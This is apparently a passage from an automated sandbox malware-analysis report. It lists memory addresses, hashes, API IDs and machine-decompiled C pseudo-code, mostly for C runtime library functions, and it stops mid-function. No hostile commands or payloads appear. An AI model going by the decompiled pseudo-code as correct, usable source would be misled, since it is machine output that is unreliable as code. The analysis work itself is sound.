                                                                                                                            0x25bf8a7c61e
                                                                                                                            0x25bf8a7c623
                                                                                                                            0x25bf8a7c62b
                                                                                                                            0x25bf8a7c62d
                                                                                                                            0x25bf8a7c633
                                                                                                                            0x25bf8a7c635
                                                                                                                            0x25bf8a7c63c
                                                                                                                            0x25bf8a7c640
                                                                                                                            0x25bf8a7c648
                                                                                                                            0x25bf8a7c652
                                                                                                                            0x25bf8a7c656
                                                                                                                            0x25bf8a7c65d
                                                                                                                            0x25bf8a7c662
                                                                                                                            0x25bf8a7c667
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c677
                                                                                                                            0x25bf8a7c67d
                                                                                                                            0x25bf8a7c67f
                                                                                                                            0x25bf8a7c682
                                                                                                                            0x25bf8a7c687
                                                                                                                            0x25bf8a7c689
                                                                                                                            0x25bf8a7c68e
                                                                                                                            0x25bf8a7c695
                                                                                                                            0x25bf8a7c697
                                                                                                                            0x25bf8a7c69a
                                                                                                                            0x25bf8a7c6a1
                                                                                                                            0x25bf8a7c6a9
                                                                                                                            0x25bf8a7c6ab
                                                                                                                            0x25bf8a7c6ae
                                                                                                                            0x25bf8a7c6b7
                                                                                                                            0x25bf8a7c6bb
                                                                                                                            0x25bf8a7c6be
                                                                                                                            0x25bf8a7c6c3
                                                                                                                            0x25bf8a7c6c9
                                                                                                                            0x25bf8a7c6cb
                                                                                                                            0x25bf8a7c6d1
                                                                                                                            0x25bf8a7c6d6
                                                                                                                            0x25bf8a7c6e1
                                                                                                                            0x25bf8a7c6e3
                                                                                                                            0x25bf8a7c6ee
                                                                                                                            0x25bf8a7c6f3
                                                                                                                            0x25bf8a7c6f7
                                                                                                                            0x25bf8a7c6fa
                                                                                                                            0x25bf8a7c6fc
                                                                                                                            0x25bf8a7c701
                                                                                                                            0x25bf8a7c703
                                                                                                                            0x25bf8a7c709
                                                                                                                            0x25bf8a7c714
                                                                                                                            0x25bf8a7c71c
                                                                                                                            0x25bf8a7c71f
                                                                                                                            0x25bf8a7c723
                                                                                                                            0x25bf8a7c72d
                                                                                                                            0x25bf8a7c730
                                                                                                                            0x25bf8a7c73c
                                                                                                                            0x25bf8a7c747
                                                                                                                            0x25bf8a7c74c
                                                                                                                            0x25bf8a7c757
                                                                                                                            0x25bf8a7c75c
                                                                                                                            0x25bf8a7c765
                                                                                                                            0x25bf8a7c772
                                                                                                                            0x25bf8a7c778
                                                                                                                            0x25bf8a7c77c
                                                                                                                            0x25bf8a7c785
                                                                                                                            0x25bf8a7c792
                                                                                                                            0x25bf8a7c797
                                                                                                                            0x25bf8a7c799
                                                                                                                            0x25bf8a7c79e
                                                                                                                            0x25bf8a7c7a4
                                                                                                                            0x25bf8a7c7a9
                                                                                                                            0x25bf8a7c7ac
                                                                                                                            0x25bf8a7c7b5
                                                                                                                            0x25bf8a7c7bb
                                                                                                                            0x25bf8a7c7bf
                                                                                                                            0x25bf8a7c7c1
                                                                                                                            0x25bf8a7c7c6
                                                                                                                            0x25bf8a7c7c8
                                                                                                                            0x25bf8a7c7cd
                                                                                                                            0x25bf8a7c7d3
                                                                                                                            0x25bf8a7c7d5
                                                                                                                            0x25bf8a7c7df
                                                                                                                            0x25bf8a7c7e3
                                                                                                                            0x25bf8a7c7e9
                                                                                                                            0x25bf8a7c7eb
                                                                                                                            0x25bf8a7c7f0
                                                                                                                            0x25bf8a7c809
                                                                                                                            0x25bf8a7c817
                                                                                                                            0x25bf8a7c82f
                                                                                                                            0x25bf8a7c834
                                                                                                                            0x25bf8a7c83d
                                                                                                                            0x25bf8a7c843
                                                                                                                            0x25bf8a7c851
                                                                                                                            0x25bf8a7c85b
                                                                                                                            0x25bf8a7c85f
                                                                                                                            0x25bf8a7c863
                                                                                                                            0x25bf8a7c868
                                                                                                                            0x25bf8a7c877
                                                                                                                            0x25bf8a7c883
                                                                                                                            0x25bf8a7c888
                                                                                                                            0x25bf8a7c88d
                                                                                                                            0x25bf8a7c894
                                                                                                                            0x25bf8a7c8ab
                                                                                                                            0x25bf8a7c8b0
                                                                                                                            0x25bf8a7c8b5
                                                                                                                            0x25bf8a7c8ba
                                                                                                                            0x25bf8a7c8c1
                                                                                                                            0x25bf8a7c8cb
                                                                                                                            0x25bf8a7c8cf
                                                                                                                            0x25bf8a7c8e2
                                                                                                                            0x25bf8a7c8e7
                                                                                                                            0x25bf8a7c8ec
                                                                                                                            0x25bf8a7c8f5
                                                                                                                            0x25bf8a7c8fb
                                                                                                                            0x25bf8a7c909
                                                                                                                            0x25bf8a7c90e
                                                                                                                            0x25bf8a7c911
                                                                                                                            0x25bf8a7c918
                                                                                                                            0x25bf8a7c91d
                                                                                                                            0x25bf8a7c922
                                                                                                                            0x25bf8a7c925
                                                                                                                            0x25bf8a7c929
                                                                                                                            0x25bf8a7c935
                                                                                                                            0x25bf8a7c942
                                                                                                                            0x25bf8a7c948
                                                                                                                            0x25bf8a7c94e
                                                                                                                            0x25bf8a7c952
                                                                                                                            0x25bf8a7c95b
                                                                                                                            0x25bf8a7c961
                                                                                                                            0x25bf8a7c967
                                                                                                                            0x25bf8a7c96d
                                                                                                                            0x25bf8a7c96f
                                                                                                                            0x25bf8a7c974
                                                                                                                            0x25bf8a7c979
                                                                                                                            0x25bf8a7c97b
                                                                                                                            0x25bf8a7c97e
                                                                                                                            0x25bf8a7c983
                                                                                                                            0x25bf8a7c985
                                                                                                                            0x25bf8a7c989
                                                                                                                            0x25bf8a7c98b
                                                                                                                            0x25bf8a7c98f
                                                                                                                            0x25bf8a7c991
                                                                                                                            0x25bf8a7c993
                                                                                                                            0x25bf8a7c99a
                                                                                                                            0x25bf8a7c9a0
                                                                                                                            0x25bf8a7c9a2
                                                                                                                            0x25bf8a7c9a6
                                                                                                                            0x25bf8a7c9ab
                                                                                                                            0x25bf8a7c9af
                                                                                                                            0x25bf8a7c9b5
                                                                                                                            0x25bf8a7c9bb
                                                                                                                            0x25bf8a7c9c0
                                                                                                                            0x25bf8a7c9c4
                                                                                                                            0x25bf8a7c9c6
                                                                                                                            0x25bf8a7c9d2
                                                                                                                            0x25bf8a7c9d6
                                                                                                                            0x25bf8a7c9dc
                                                                                                                            0x25bf8a7c9e9
                                                                                                                            0x25bf8a7c9f5
                                                                                                                            0x25bf8a7ca04
                                                                                                                            0x25bf8a7ca09
                                                                                                                            0x25bf8a7ca12
                                                                                                                            0x25bf8a7ca25
                                                                                                                            0x25bf8a7ca2a
                                                                                                                            0x25bf8a7ca2d
                                                                                                                            0x25bf8a7ca36
                                                                                                                            0x25bf8a7ca38
                                                                                                                            0x25bf8a7ca43
                                                                                                                            0x25bf8a7ca49
                                                                                                                            0x25bf8a7ca4c
                                                                                                                            0x25bf8a7ca51
                                                                                                                            0x25bf8a7ca59
                                                                                                                            0x25bf8a7ca5e
                                                                                                                            0x25bf8a7ca62
                                                                                                                            0x25bf8a7ca67
                                                                                                                            0x25bf8a7ca6a
                                                                                                                            0x25bf8a7ca73
                                                                                                                            0x25bf8a7ca75
                                                                                                                            0x25bf8a7ca7d
                                                                                                                            0x25bf8a7ca83
                                                                                                                            0x25bf8a7ca89
                                                                                                                            0x25bf8a7ca8f
                                                                                                                            0x25bf8a7caa2
                                                                                                                            0x25bf8a7caa6
                                                                                                                            0x25bf8a7caaf
                                                                                                                            0x25bf8a7cab5
                                                                                                                            0x25bf8a7cabb
                                                                                                                            0x25bf8a7cac1
                                                                                                                            0x25bf8a7cac7
                                                                                                                            0x25bf8a7cacd
                                                                                                                            0x25bf8a7cad1
                                                                                                                            0x25bf8a7cad6
                                                                                                                            0x25bf8a7cada
                                                                                                                            0x25bf8a7cadf
                                                                                                                            0x25bf8a7cae3
                                                                                                                            0x25bf8a7cae8
                                                                                                                            0x25bf8a7caed
                                                                                                                            0x25bf8a7caf2
                                                                                                                            0x25bf8a7caf6
                                                                                                                            0x25bf8a7cafb
                                                                                                                            0x25bf8a7cb00
                                                                                                                            0x25bf8a7cb05
                                                                                                                            0x25bf8a7cb0a
                                                                                                                            0x25bf8a7cb0f
                                                                                                                            0x25bf8a7cb12
                                                                                                                            0x25bf8a7cb15
                                                                                                                            0x25bf8a7cb1a
                                                                                                                            0x25bf8a7cb1f
                                                                                                                            0x25bf8a7cb24
                                                                                                                            0x25bf8a7cb2a
                                                                                                                            0x25bf8a7cb32
                                                                                                                            0x25bf8a7cb35
                                                                                                                            0x25bf8a7cb3d
                                                                                                                            0x25bf8a7cb43
                                                                                                                            0x25bf8a7cb73

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$Locale_invalid_parameter_noinfo$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexitwrite_multi_charwrite_string
                                                                                                                            • String ID: -
                                                                                                                            • API String ID: 3246410048-2547889144
                                                                                                                            • Opcode ID: 028f1f1eae3374fd4aa8a94153580cfdd1fd6873e23f0f77f775f212f8225329
                                                                                                                            • Instruction ID: ab237c3b9c4ef7288d74e693cc4a79feb4ae9dba6d1c6ab54efa7361301ab7d0
                                                                                                                            • Opcode Fuzzy Hash: 028f1f1eae3374fd4aa8a94153580cfdd1fd6873e23f0f77f775f212f8225329
                                                                                                                            • Instruction Fuzzy Hash: 87B1F433604E8086FF66CB659C483AE6BA0F7817B6F341116FE4907ED9DB38C9419768
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD164C Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 388111225-0
                                                                                                                            • Opcode ID: 2ece736ccf34be7b8f844ccbcf1398da1420c8e9a36c9c48ef6cfb0a1ee02dda
                                                                                                                            • Instruction ID: 9b17dfb926ff60d5150a808dd1c0ed710c5db08e20a48c4bc6f0677008895dce
                                                                                                                            • Opcode Fuzzy Hash: 2ece736ccf34be7b8f844ccbcf1398da1420c8e9a36c9c48ef6cfb0a1ee02dda
                                                                                                                            • Instruction Fuzzy Hash: B731A133608B054EEB1B6F689C8A3B97691EB42331F254659F412CB6E3D77498018A69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD57D8 Relevance: 16.3, APIs: 13, Instructions: 90COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$BoundaryDeleteDescriptor_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3555341564-0
                                                                                                                            • Opcode ID: a1abfc4af50810227ff6ca1c989a2150589366c2bf99d4b18f04ac51b81b0102
                                                                                                                            • Instruction ID: f9c1f57c0756ece768d19a0f6925546ac72b33c69be0c58fd7ee3cfcabc85801
                                                                                                                            • Opcode Fuzzy Hash: a1abfc4af50810227ff6ca1c989a2150589366c2bf99d4b18f04ac51b81b0102
                                                                                                                            • Instruction Fuzzy Hash: 8931DD73118C045FEE99FB64DCDDBA83791EB15312F648444F91ACB992CB34A851D734
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A84BD8 Relevance: 16.3, APIs: 13, Instructions: 60COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: free$_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2288870239-0
                                                                                                                            • Opcode ID: d059cf2b497bb07b6b9f35adf6d66a7cdc87e1c1edd293a69e655e874bacf2fe
                                                                                                                            • Instruction ID: 33e70569f1a77b1d914c269e9a50b027e350dd6ff76c694a044eef2e7695e522
                                                                                                                            • Opcode Fuzzy Hash: d059cf2b497bb07b6b9f35adf6d66a7cdc87e1c1edd293a69e655e874bacf2fe
                                                                                                                            • Instruction Fuzzy Hash: AF31E163215C0591FE53EB61EC9D3BC1364E780766FA80006BA1E57D95CF39C8C59379
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD2438 Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2644381645-0
                                                                                                                            • Opcode ID: 92b0c9998a49a1ff066f8d0d4c609502185e615d9af7485e153b0ca049bbbe44
                                                                                                                            • Instruction ID: 9f8c27b74499516295cd6a7e4e4fad6603c35e8a2c10f0e7c5787c679943c95a
                                                                                                                            • Opcode Fuzzy Hash: 92b0c9998a49a1ff066f8d0d4c609502185e615d9af7485e153b0ca049bbbe44
                                                                                                                            • Instruction Fuzzy Hash: F5210533608E004EFB166B68DC5E7B972D1EB86332F250249F456C75E7D7746841827D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8AD22C0 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1078912150-0
                                                                                                                            • Opcode ID: d2931e0a4805d45a47c3ca51ec169f0001f81ffbaadf8b9bf75f2cd77fe7735a
                                                                                                                            • Instruction ID: b27de1472f54399cafc86895a6ea17bda0033b3f75e71c5d54549ffa0f3407fe
                                                                                                                            • Opcode Fuzzy Hash: d2931e0a4805d45a47c3ca51ec169f0001f81ffbaadf8b9bf75f2cd77fe7735a
                                                                                                                            • Instruction Fuzzy Hash: 0821F733A08A004EFB166B68DC4E3BD7691EB86332F254618F456C75E7D774A841827E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8A80A4C Relevance: 15.1, APIs: 10, Instructions: 81COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 54%
                                                                                                                            			E0000025B25BF8A80A4C(signed int __ecx, void* __edx, signed int __edi, signed int __esi, signed int* __rax, long long __rbx, long long __rdx, long long __rsi, signed int _a8, long long _a16, long long _a24) {
				void* __rdi;
				void* _t30;
				signed int _t35;
				void* _t49;
				intOrPtr* _t55;
				signed int* _t56;
				signed long long _t64;
				signed long long _t72;

				_a16 = __rbx;
				_a24 = __rsi;
				_a8 = __ecx;
				r14d = r8d;
				if (__edi != 0xfffffffe) goto 0xf8a80a8e;
				E0000025B25BF8A7B82C(__rax);
				 *__rax = 0;
				E0000025B25BF8A7B89C(__rax);
				 *__rax = 9;
				goto 0xf8a80b4b;
				if (__ecx < 0) goto 0xf8a80b34;
				_t49 = __edi -  *0xf8aa7384;
				if (_t49 >= 0) goto 0xf8a80b34;
				_t72 = __ecx >> 5;
				_t64 = __ecx * 0x58;
				_t55 =  *((intOrPtr*)(0xf8aa3200 + _t72 * 8));
				if (_t49 == 0) goto 0xf8a80b34;
				if ((0 | r8d - 0x7fffffff < 0x00000000) != 0) goto 0xf8a80aef;
				E0000025B25BF8A7B82C(_t55);
				 *_t55 = 0;
				E0000025B25BF8A7B89C(_t55);
				 *_t55 = 0x16;
				goto 0xf8a80b46;
				E0000025B25BF8A83FA8(0, __edi, __rbx, __ecx, _t64);
				_t56 =  *((intOrPtr*)(0xf8aa3200 + _t72 * 8));
				if (( *(_t56 + _t64 + 8) & 0x00000001) == 0) goto 0xf8a80b14;
				r8d = r14d;
				_t35 = E0000025B25BF8A80B68(__edi, __esi & 0x0000001f, _t56, __rdx);
				goto 0xf8a80b29;
				E0000025B25BF8A7B89C(_t56);
				 *_t56 = 9;
				E0000025B25BF8A7B82C(_t56);
				 *_t56 = _t35;
				0xf8a84408();
				goto 0xf8a80b4e;
				E0000025B25BF8A7B82C(_t56);
				 *_t56 = _t35 | 0xffffffff;
				_t30 = E0000025B25BF8A7B89C(_t56);
				 *_t56 = 9;
				return E0000025B25BF8A7BEC4(_t30) | 0xffffffff;
			}











                                                                                                                            0x25bf8a80a4c
                                                                                                                            0x25bf8a80a51
                                                                                                                            0x25bf8a80a56
                                                                                                                            0x25bf8a80a67
                                                                                                                            0x25bf8a80a73
                                                                                                                            0x25bf8a80a75
                                                                                                                            0x25bf8a80a7c
                                                                                                                            0x25bf8a80a7e
                                                                                                                            0x25bf8a80a83
                                                                                                                            0x25bf8a80a89
                                                                                                                            0x25bf8a80a92
                                                                                                                            0x25bf8a80a98
                                                                                                                            0x25bf8a80a9e
                                                                                                                            0x25bf8a80aaa
                                                                                                                            0x25bf8a80ab8
                                                                                                                            0x25bf8a80abc
                                                                                                                            0x25bf8a80ac9
                                                                                                                            0x25bf8a80ad9
                                                                                                                            0x25bf8a80adb
                                                                                                                            0x25bf8a80ae0
                                                                                                                            0x25bf8a80ae2
                                                                                                                            0x25bf8a80ae7
                                                                                                                            0x25bf8a80aed
                                                                                                                            0x25bf8a80af1
                                                                                                                            0x25bf8a80af7
                                                                                                                            0x25bf8a80b01
                                                                                                                            0x25bf8a80b03
                                                                                                                            0x25bf8a80b10
                                                                                                                            0x25bf8a80b12
                                                                                                                            0x25bf8a80b14
                                                                                                                            0x25bf8a80b19
                                                                                                                            0x25bf8a80b1f
                                                                                                                            0x25bf8a80b24
                                                                                                                            0x25bf8a80b2b
                                                                                                                            0x25bf8a80b32
                                                                                                                            0x25bf8a80b34
                                                                                                                            0x25bf8a80b39
                                                                                                                            0x25bf8a80b3b
                                                                                                                            0x25bf8a80b40
                                                                                                                            0x25bf8a80b65

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708356136.0000025BF8A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8A60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8a60000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 388111225-0
                                                                                                                            • Opcode ID: 84aafaf433f9753625a7bf88cfaeb6d151adc82864f8d1a7e0c022a9c9f96788
                                                                                                                            • Instruction ID: 1d0028082928118a621fdc66ccc9f2981bc1e5f400276945f29671d2e01419f1
                                                                                                                            • Opcode Fuzzy Hash: 84aafaf433f9753625a7bf88cfaeb6d151adc82864f8d1a7e0c022a9c9f96788
                                                                                                                            • Instruction Fuzzy Hash: BB317C73600A408AFF176F65AC8936D6A50EB807B6F654614FA2507FD2C77888529B3C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 01313F80 Relevance: 14.1, Strings: 11, Instructions: 337COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 66%
                                                                                                                            			E01313F80(void* __eax, void* __esp, long long __rax, signed long long __rbx, long long __rcx, long long __rdi, long long __rbp, signed long long __r9, void* __r14, long long _a8, signed long long _a16, long long _a24, long long _a32) {
				char _v8;
				long long _v16;
				long long _v24;
				signed long long _v32;
				long long _v40;
				long long _v48;
				char _v56;
				long long _v64;
				char _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				signed long long _v112;
				long long _v120;
				long long _v200;
				void* _t122;
				void* _t146;
				void* _t147;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				void* _t169;
				void* _t171;
				void* _t172;
				void* _t189;
				long long _t192;
				long long _t194;
				long long _t198;
				intOrPtr _t199;
				intOrPtr _t212;
				intOrPtr _t213;
				intOrPtr _t214;
				signed long long _t215;
				signed long long _t218;
				long long _t219;
				void* _t223;
				long long _t224;
				void* _t227;
				intOrPtr _t228;
				signed long long _t232;
				signed long long _t233;
				signed long long _t234;
				long long _t236;
				void* _t238;
				long long* _t241;
				void* _t248;
				long long* _t249;
				intOrPtr* _t257;
				signed long long _t258;
				void* _t259;
				void* _t263;
				signed long long _t264;
				signed long long _t265;
				signed long long _t266;
				void* _t268;
				void* _t269;
				void* _t274;

				L0:
				while(1) {
					L0:
					_t269 = __r14;
					_t258 = __r9;
					_t242 = __rbp;
					_t229 = __rdi;
					_t219 = __rcx;
					_t215 = __rbx;
					_t190 = __rax;
					_t172 = __esp;
					_t114 = __eax;
					if( &_v80 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L70;
					}
					L1:
					_t249 = _t248 - 0xd0;
					_v8 = __rbp;
					_t242 =  &_v8;
					_a8 = __rax;
					_a16 = __rbx;
					_a24 = __rcx;
					_a32 = __rdi;
					if( *0x14cf7cc != 0) {
						L41:
						return __eax;
					} else {
						L2:
						_t192 = _a8;
						if(_t192 == 0) {
							L69:
							_t190 = 0x138dd67;
							E01330BA0(0x138dd67, _t215, _t242);
							goto L70;
						} else {
							L3:
							_t162 =  *(_t192 + 0x17) & 0x1f;
							if(( *(_t192 + 0x17) & 0x1f) != 0x16) {
								L68:
								E013513C0(_t156, _t167, _t169, _t172, _t192, _t215, _t229, _t242, _t255, _t269);
								_t229 = _t192;
								_t232 = _t215;
								r9d = 0xd;
								_t215 = 0x138d80a;
								E01345EA0(0xe, _t172, _t192, 0x138d80a, _t219, _t229, _t232, _t242, 0x1387e87, _t258, _t268, _t269);
								E01330BA0(_t192, 0x138d80a, _t242);
								goto L69;
							} else {
								L4:
								if( *((long long*)(_t192 + 0x30)) == 0) {
									L67:
									_t192 = 0x13882a4;
									E01330BA0(0x13882a4, _t215, _t242);
									goto L68;
								} else {
									L5:
									_v88 = _t192;
									_t152 = 0;
									E0130F560(__rbx,  &_v8);
									if(__rbx != 0) {
										L9:
										_t222 = _a16;
										_t224 = _t222;
										if(__rbx == _t222) {
											L14:
											_t194 = _v88;
											goto L15;
										} else {
											L10:
											_t194 = _v88;
											_t241 =  *((intOrPtr*)(_t194 + 0x30));
											if(_t241 == 0 ||  *((long long*)(_t241 + 8)) != 0) {
												L53:
												_t199 = 0x138f011;
												_t114 = E01330BA0(0x138f011, _t215, _t242);
												goto L54;
											} else {
												L12:
												if( *_t241 < 0x10) {
													L15:
													_t233 = _a24;
													if(_t233 == 0) {
														L40:
														asm("inc esp");
														_v72 = E01314640;
														_v64 =  &_a8;
														 *_t249 =  &_v72;
														_t122 = E013560C0(_t152, _t156, _t162, _t167, _t169, _t171, _t172, _t189, _t242, _t259, _t263, _t268, _t269, _t274);
														asm("inc ebp");
														return _t122;
													} else {
														L16:
														_t167 =  *(_t233 + 0x17) & 0x1f;
														if(dil != 0x13) {
															L52:
															_t198 = _t233;
															E013513C0(_t156, _t167, _t169, _t172, _t198, _t215, _t229, _t242, _t255, _t269);
															_t156 = 0x29;
															_t229 = _t198;
															_t234 = _t215;
															_t255 = 0x13886a0;
															r9d = 0x10;
															_t215 = 0x138d9c8;
															E01345EA0(_t152, _t172, _t198, 0x138d9c8, _t222, _t198, _t234, _t242, 0x13886a0, _t258, _t268, _t269);
															E01330BA0(_t198, 0x138d9c8, _t242);
															goto L53;
														} else {
															L17:
															_v104 = _t233;
															_t167 =  *(_t233 + 0x32) & 0x0000ffff;
															asm("o16 nop [eax+eax]");
															if(( *(_t233 + 0x32) & 0x8000) != 0) {
																L51:
																E013513C0(_t156, _t167, _t169, _t172, _t194, _t215, _t229, _t242, _t255, _t269);
																_v80 = _t194;
																_v112 = _t215;
																_t201 = _v104;
																E013513C0(_t156, _t167, _t169, _t172, _v104, _t215, _t229, _t242, _t255, _t269);
																_t222 = 0x1388d52;
																 *_t249 = 0x1388d52;
																_v200 = 0x12;
																_t156 = 0x22;
																_t229 = _v80;
																_t233 = _v112;
																_t255 = 0x13880c8;
																r9d = 0xe;
																_t264 = _t215;
																_t215 = 0x138ccfa;
																E01346080(_t152, _t162, _t172, _v104, 0x138ccfa, 0x1388d52, _v80, _t233, _t242, 0x13880c8, _t258, _t201, _t264, _t268, _t269);
																E01330BA0(_t201, 0x138ccfa, _t242);
																goto L52;
															} else {
																L18:
																_t158 =  *(_t233 + 0x30) & 0x0000ffff;
																if(_t158 != 1) {
																	L50:
																	E013513C0(_t158, _t167, _t169, _t172, _t194, _t215, _t229, _t242, _t255, _t269);
																	_v80 = _t194;
																	_v112 = _t215;
																	_t194 = _v104;
																	E013513C0(_t158, _t167, _t169, _t172, _t194, _t215, _t229, _t242, _t255, _t269);
																	_t156 = 0x22;
																	_t229 = _v80;
																	_t255 = 0x13880c8;
																	r9d = 0xe;
																	_t265 = _t215;
																	_t215 = 0x138ccfa;
																	E01345F80(_t152, _t172, _t194, 0x138ccfa, _t222, _v80, _v112, _t242, 0x13880c8, _t258, _t194, _t265, _t268, _t269);
																	E01330BA0(_t194, 0x138ccfa, _t242);
																	goto L51;
																} else {
																	L19:
																	_t167 =  *(_t233 + 0x14) & 0x000000ff;
																	if((dil & 0x00000001) == 0) {
																		_t152 = 0x38;
																	} else {
																		_t152 = 0x48;
																	}
																	if(_t222 <= 0) {
																		L49:
																		E013588C0();
																		goto L50;
																	} else {
																		L23:
																		_t231 =  *((intOrPtr*)(_t233 + _t215));
																		_v96 = _t231;
																		if(_t231 != _t194) {
																			L24:
																			r8d =  *(_t231 + 0x17) & 0x000000ff;
																			r8d = r8d & 0x0000001f;
																			if(r8b == 0x16) {
																				L29:
																				_t212 = _t231;
																				_t147 = E01351460(_t114, _t212);
																				if(_t212 != 0) {
																					_t213 = _v88;
																					E01351460(_t147, _t213);
																					_t158 = _t158 & 0xffffff00 | _t213 == 0x00000000;
																				} else {
																					_t158 = 1;
																				}
																				if(_t158 == 0) {
																					goto L47;
																				}
																				L33:
																				_t228 = _v96;
																				_t215 =  *((intOrPtr*)(_t228 + 0x30));
																				_t194 = _v88;
																				if( *((intOrPtr*)(_t194 + 0x30)) != _t215) {
																					goto L46;
																				}
																				L34:
																				_t233 = _v104;
																				_t231 = _t228;
																			} else {
																				L25:
																				if(r8b != 0x14) {
																					L46:
																					E013513C0(_t158, _t167, _t169, _t172, _t194, _t215, _t231, _t242, _t255, _t269);
																					_v80 = _t194;
																					_v112 = _t215;
																					_t202 = _v104;
																					E013513C0(_t158, _t167, _t169, _t172, _v104, _t215, _t231, _t242, _t255, _t269);
																					_t158 = 0x22;
																					_t231 = _v80;
																					_t255 = 0x13880c8;
																					r9d = 0xe;
																					_t266 = _t215;
																					_t215 = 0x138ccfa;
																					E01345F80(_t152, _t172, _v104, 0x138ccfa, _t222, _v80, _v112, _t242, 0x13880c8, _t258, _t202, _t266, _t268, _t269);
																					E01330BA0(_t202, 0x138ccfa, _t242);
																					L47:
																					_t194 = _v88;
																					goto L46;
																				}
																				L26:
																				if( *((long long*)(_t231 + 0x40)) != 0) {
																					L27:
																					_t215 = _a8;
																					_t214 = _t231;
																					_t222 = _t224;
																					E01309240(_t167, _t172, _t214, _t215, _t222, _t231, _t242, _t255, _t258, _t269);
																					if(_t214 == 0) {
																						L48:
																						_t194 = _v88;
																						goto L46;
																					}
																					L28:
																					_t194 = _v88;
																					_t233 = _v104;
																					_t231 = _v96;
																				}
																			}
																		}
																		L35:
																		if(( *(_t233 + 0x14) & 1) == 0) {
																		}
																		_t152 =  *(_t233 + 0x30) & 0x0000ffff;
																		_t166 = ( *(_t233 + 0x32) & 0x7fff) + _t152;
